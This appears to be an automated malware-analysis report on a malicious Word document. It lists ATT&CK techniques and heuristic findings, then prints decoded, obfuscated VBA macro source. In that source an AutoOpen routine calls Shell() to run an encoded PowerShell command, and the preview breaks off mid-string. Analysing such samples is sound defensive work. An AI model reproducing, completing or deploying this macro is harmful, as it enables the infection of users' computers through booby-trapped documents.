Verdict: MALICIOUS (Risk Score 182)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is an OLE document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function, a critical indicator of malicious activity, to execute commands. The obfuscated nature of the script prevents a precise reconstruction of the command, but the use of Shell() strongly suggests the download and execution of a second-stage payload. The large slack space in the OLE structure is also a common characteristic of packed or obfuscated malicious documents.
Heuristics (6):
- VBA macros detected (medium; 2 related findings; OLE_VBA_MACROS): Document contains VBA macro code.
- Shell() call in VBA (critical; OLE_VBA_SHELL): Shell() call in VBA.
- AutoOpen macro (high; OLE_VBA_AUTOOPEN): AutoOpen macro.
- OLE document has large unaccounted-for region (high; OLE_SLACK_ANOMALY): OLE file is 70,523 bytes but its declared streams total only 35,455 bytes; 35,068 bytes (50%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- Legacy WordBasic auto-exec macro marker (medium; OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info; EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6081 bytes |

SHA-256: c766f79c1eb20b6a03805116997526d11a906ac6d5fdef9ed8898d86d6e0d7b3

Preview (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "foNiJLsQr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function fSODOmNMk()
On Error Resume Next
For qfbsO = aVEAE To QrZTPP
For qLwNi = lEGdv To 86061
jBfuKJ = (1660 / CBool(wzFzE) - pjwOp / Oct(51823 / Hex(85569) / CrSsi + Rnd(QTrJIS / Fix(37))))
Next
OLiIF = 28652 - 24599
Next
For NtPipw = IPGRt To zocRb
For mcGwp = PaUTFj To 23178
XowCOs = (63149 / CBool(LbCqZq) - XCqdr / Oct(49922 / Hex(34896) / wasZV + Rnd(oJWFN / Fix(37))))
Next
KqaDiq = 88191 - 32405
Next
fSODOmNMk = ivMiR + Shell(RGWiMLSrDPl + Chr(AiknkvBZ + vbKeyP + KwDLjItFSJJ) + "owers" + WBUzimvvWWf + HwHznw + NiSjqWaKi + SdkMMcMi + sMJKiRLCHEQ, 17641 - 17641)
For uwMYLz = OGUFF To BcWSLq
For RfkLA = jbnvA To 61731
cCbfB = (20271 / CBool(XvQkI) - dozjPf / Oct(6563 / Hex(88269) / OOAYG + Rnd(paKUZ / Fix(37))))
Next
FzAqR = 1268 - 72813
Next
End Function
Sub Autoopen()
On Error Resume Next
For WPzDPb = iHfUcH To nNfcE
For hUFQij = pzpzf To 33750
pwOzJf = (50508 / CBool(TiAww) - LnLpww / Oct(34425 / Hex(5079) / jViDC + Rnd(RipLNZ / Fix(37))))
Next
wiSZMW = 1552 - 52369
Next
fSODOmNMk
For ljhdJ = IiScnp To bbbYiC
For KljRXp = WXmvBi To 37475
wWZXmZ = (13339 / CBool(klzTGr) - orwiFz / Oct(125 / Hex(31548) / UBlLj + Rnd(lGLscF / Fix(37))))
Next
HPWDtw = 60134 - 44708
Next
End Sub
Attribute VB_Name = "WiZzDDDOkw"
Function WBUzimvvWWf()
On Error Resume Next
For PLBOYM = UkZGQ To YEKaR
For bWAuj = kzKiPl To 53753
cpEQw = (56153 / CBool(jFzEz) - zTQlv / Oct(46621 / Hex(35294) / TPQRan + Rnd(ApUni / Fix(37))))
Next
jjzui = 77618 - 16584
Next
buSHckDu = "HeLL -e IAAuACg" + "AKABnAGUA" + "VAAtAFYAQQ" + "ByAEkAYQBiAEwAZ" + "QAgACcAKg" + "BtA" + "EQAcgAqACcA" + "KQAuAE4AYQBNAGU" + "AWwAzA"
For RBqlfk = usUNJJ To ZnwWp
For fPiQTz = jRrRj To 18717
COaju = (5755 / CBool(GwAZUA) - JLvIwS / Oct(30617 / Hex(2514) / aRfUu + Rnd(BCdzFF / Fix(37))))
Next
NRbmF = 48193 - 37018
Next
JZuFw = "CwAMQAxACwAMgBd" + "AC0ASgBvAGkA" + "bgAnACc" + "AKQAoAG4ARQ"
For qzzpaF = JlrnBr To POiqd
For zwUuVw = djMMqi To 87585
SjiUXF = (87587 / CBool(ISEUNC) - DPvXf / Oct(89211 / Hex(58565) / TcHSc + Rnd(iwTzQ / Fix(37))))
Next
iEWFqE = 6539 - 23374
Next
RwZzjtBObYt = "BX" + "AC0AT" + "wBiAEoARQBDAH" + "QAIABJAG8AL" + "gBDAG8AbQBwAF" + "IARQBTAHM" + "ASQ" + "BPAG4ALgBEAEUA" + "RgBMAEEAdABlAFM"
For RdkbTI = vKOpnb To rPmQT
For VkWwFi = sphbqS To 55661
wXqJQ = (62379 / CBool(JjbJG) - iqDnjh / Oct(12292 / Hex(62656) / oWpJF + Rnd(dmwVw / Fix(37))))
Next
tsvHC = 95823 - 39025
Next
MEdnBRO = "AVAB" + "yAEUAYQ" + "Bt" + "ACgAW"
For mUvXFO = dnHkWV To iUUHbw
For wdoIlk = HjhkmE To 40678
aRDqF = (99702 / CBool(rlbmDJ) - nuWXvp / Oct(82943 / Hex(14441) / UiCVH + Rnd(AkRVOt / Fix(37))))
Next
Ekqfz = 73952 - 5927
Next
zZcVBRX = "wBzAHk" + "AcwBUA" + "EUATQAu" + "AG" + "kAbwAu" + "AG0ARQBNAE8Acg"
For zhnjsm = OIfcT To jMDir
For krVhu = kqlhQr To 8997
iVwOo = (27992 / CBool(mWIpma) - VYnBF / Oct(41264 / Hex(35428) / dzswIv + Rnd(jsnXOT / Fix(37))))
Next
Pppdd = 96028 - 40538
Next
wcBwiNaWcV = "BZA" + "FMAdAByAEU" + "AYQBNAF0AWwB" + "DAG8AbgB2" + "AGUAUgBUAF0AOg" + "A6AEYAcgBvAE" + "0AYgBBAF" + "MARQA2ADQAcw" + "B0"
For rIHjV = tOmjm To rzVpGs
For pPBOL = HIwLcs To 39400
RHkrY = (50978 / CBool(niBoc) - WSTzX / Oct(70715 / Hex(75648) / zpuvCN + Rnd(vCJqR / Fix(37))))
Next
Zplzh = 34241 - 91240
Next
tNqcK = "AHIASQBOAEcA" + "KAAgACcAVgBaAE" + "QAYg" + "BUAHMASgBB"
For lAZiH = qiMFHh To TRpwWM
For sbrzL = wdiBp To 36481
dMpVMu = (55422 / CBool(QqEjk) - GXvBLE / Oct(69998 / Hex(18788) / IbXHo + Rnd(vKPop / Fix(37))))
Next
HbUjb = 69432 - 94683
Next
wpFzKRfMK = "AE" + "U
```

... (truncated)